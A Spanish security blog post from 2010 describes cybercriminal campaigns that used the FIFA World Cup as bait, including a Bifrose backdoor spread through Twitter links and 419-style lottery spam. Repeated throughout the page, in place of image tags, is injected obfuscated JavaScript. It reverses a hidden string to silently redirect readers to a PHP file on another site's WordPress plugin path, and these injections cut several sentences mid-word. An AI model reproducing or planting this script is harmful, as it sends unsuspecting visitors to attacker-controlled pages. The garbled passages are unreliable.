Crecen los ataques que utilizan el Mundial de Fútbol de la FIFA como señuelo
Madrid, 16 de junio de 2010 – La CNN califica el Mundial de Fútbol 2010 como el inicio de la “Edad de los Medios Sociales”, por lo que poco sorprende que un número de campañas de ciber-crimen hayan sido identificadas utilizando el evento para atraer a los seguidores y fans de la Copa del Mundo con el fin de que desvelen información personal y otro tipo de datos.
Los tweets del ataque a la FIFA colapsan las puertas traseras
Uno de los ataques más recientes que emplea el Mundial de Fútbol de la FIFA como cebo incluye una táctica de ingeniería social derivada de una campaña de malware vista en Twitter. Se han localizado varios programas maliciosos que están siendo distribuidos a través del popular sitio de microblogging. Dichas campañas de malware aprovechan la notoriedad de tal evento para persuadir y atraer a los usuarios a que accedan a los links maliciosos incluidos en los Tweets.
El primer malware activado hace uso de la celebración de la “Copa del Mundo de la FIFA” y fue enviado a través del siguiente Tweet:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tore.xmr3.com/145567/11772561/76933/82487/jobsettings/docs/Link_FIFA_1276682335653.JPG” alt=”” width=”570″ height=”104″ /> </p>
<p>Al acceder al link los usuarios permiten la descarga de una copia de una puerta trasera detectada como BKDR_BIFROSE.SMK, que conecta a una dirección IP que permite a un usuario remo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to realizar actividades maliciosas en los sistemas afectados. Estas actividades incluyen el envío y recepción de archivos, keylogging (o lectura de las pulsaciones del teclado) o la recuperación de nombres de usuario y sus claves. También tiene capacidades de rootkit (programa malicioso difícil de detectar que es similar a un troyano y que posibilita al ciber-delincuente controlar el ordenador de usuario), lo que le permite ocultar sus procesos y archivos de sus víctimas.
El Mundial de Fútbol de la FIFA es un evento global increíblemente popular que, como es evidente, ya ha puesto en marcha la maquinaria para que entren en acción múltiples oportunistas y ciber-criminales. El uso de las redes sociales para perpetuar esos ataques en beneficio de los criminales tampoco es algo inusual.
La FIFA también se ha convertido en objetivo del Spam
En otro ataque, se descubrió que se estaban ejecutando dos tipos spam.
El primer ejemplo (véase la Figura1) tenía un archivo adjunto .DOC que informada a los receptores de un supuesto nuevo concurso denominado “Final Draw” o “Sorteo Final” en función del país, y que había sido puesto en marcha en colaboración con el Comité de Organización de la FIFA. También decía que el receptor recibiría un premio de 550.000 dólares. Para poder cobrar este premio, sin embargo, el “ganador” debía contactar inmediatamente con la agencia distribuidora a través de la información indicada en el email. El correo electrónico también solicitaba información personal del receptor.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tore.xmr3.com/145567/11772561/76933/82487/jobsettings/docs/Sample%2520mail.doc_1276682397157.JPG” alt=”” width=”259″ height=”231″ /><br />
<img decoding=)
to que contiene una carta adjunta, igualmente mal escrita, en formato PDF. En ésta se pide a los receptores que divulguen una información específica relacionada con una transferencia de fondos por cantidad de 10,5 millones de dólares. En caso de aceptar la propuesta, el usuario supuestamente conseguirá el 30% de dicha cifra.
Tenga en cuenta que está táctica recuerda al infame timo 419 o Cartas Nigerianas, que persuadían a los usuarios para que enviaran un cantidad de dinero prometiéndoles que, a cambio, recibirían una importante suma como recompensa por su cooperación. En este caso, los desafortunados “optimistas” son engañados con la promesa de recibir unas entradas para asistir a su competición deportiva favorita.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tore.xmr3.com/145567/11772561/76933/82487/jobsettings/docs/Fake%2520letter_1276682523514.JPG” alt=”” width=”275″ height=”265″ /><br />
<img decoding=)
to seguido se pide ayuda al receptor del correo electrónico.
El spam con el tema de la FIFA indicado (Figura 4) utiliza la misma técnica que en el segundo ejemplo: prometer una cantidad de dinero al receptor del email.
Ninguno de los dos tipos de scam solicitan directamente dinero en efectivo. En cambio, ambos piden información o invitan a que los receptores se coordinen con un contacto falso (como ocurre en el ejemplo de la figura 3) acompañado de una llamada a la acción para proceder a enviar sus datos de contacto (figura 4). Los ciber-delincuentes que se encuentran detrás de estos fraudes son individuos que están utilizando Internet para cometer crímenes relacionados con el robo de identidad, envío de spam, phishing y otros tipos de fraudes.
Por otro lado, en otra campaña de spam, se analizó un mensaje de correo electrónico que ha sido enviado recientemente:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tore.xmr3.com/145567/11772561/76933/82487/jobsettings/docs/Sample%25202010FIFA%2520Spam_1276682706536.JPG” alt=”” width=”271″ height=”283″ /><br />
<img decoding=)
to un archivo .PDF que contiene los detalles de un supuesto premio de lotería que el receptor del email podría ganar. Para ello, se pide a la víctima que facilite información personal, la cual debe ser enviada a una persona de contacto o al emisor del correo electrónico antes de que el premio pueda ser reclamado.
Analizando las diferentes campañas de fraudes, se ha observado que el nexo de unión entre los recientes envíos de spam estaba en que el supuesto remitente de los emails: la señora Michelle Matins, Vicepresidenta Ejecutiva (no se menciona ninguna corporación), que también es la persona que firma el scam 419, también conocido como el timo Nigeriano.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tore.xmr3.com/145567/11772561/76933/82487/jobsettings/docs/Screenshot%2520other%25202010FIFA%2520Spam_1276682822329.JPG” alt=”” width=”265″ height=”302″ /> </p>
<p>Algunos ejemplos recuperados estaban libres de adjun<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tos y presuntamente habían sido enviados por un supuesto Vicepresidente de la FIFA, llamado Geoff Thompson. Sin embargo, la investigación realizada revela que este nombre también estaba relacionado con un viejo fraude.
Ya se informó de la existencia de un primer ataque de spam bancario relacionado con el Mundial de Fútbol 2010 de la FIFA a principios de 2009, 18 meses antes de que el actual evento tuviera lugar. El spam entonces detectado estaba relacionado con un premio de la lotería online.
Comentario:
Y se sabe que los acontecimientos extraordinarios son aprovechados por los spammers para “colar” entre las noticias, y este no podía ser menos . Cuidado con ellos ! 😉
saludos
ms, 16-6-2010
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.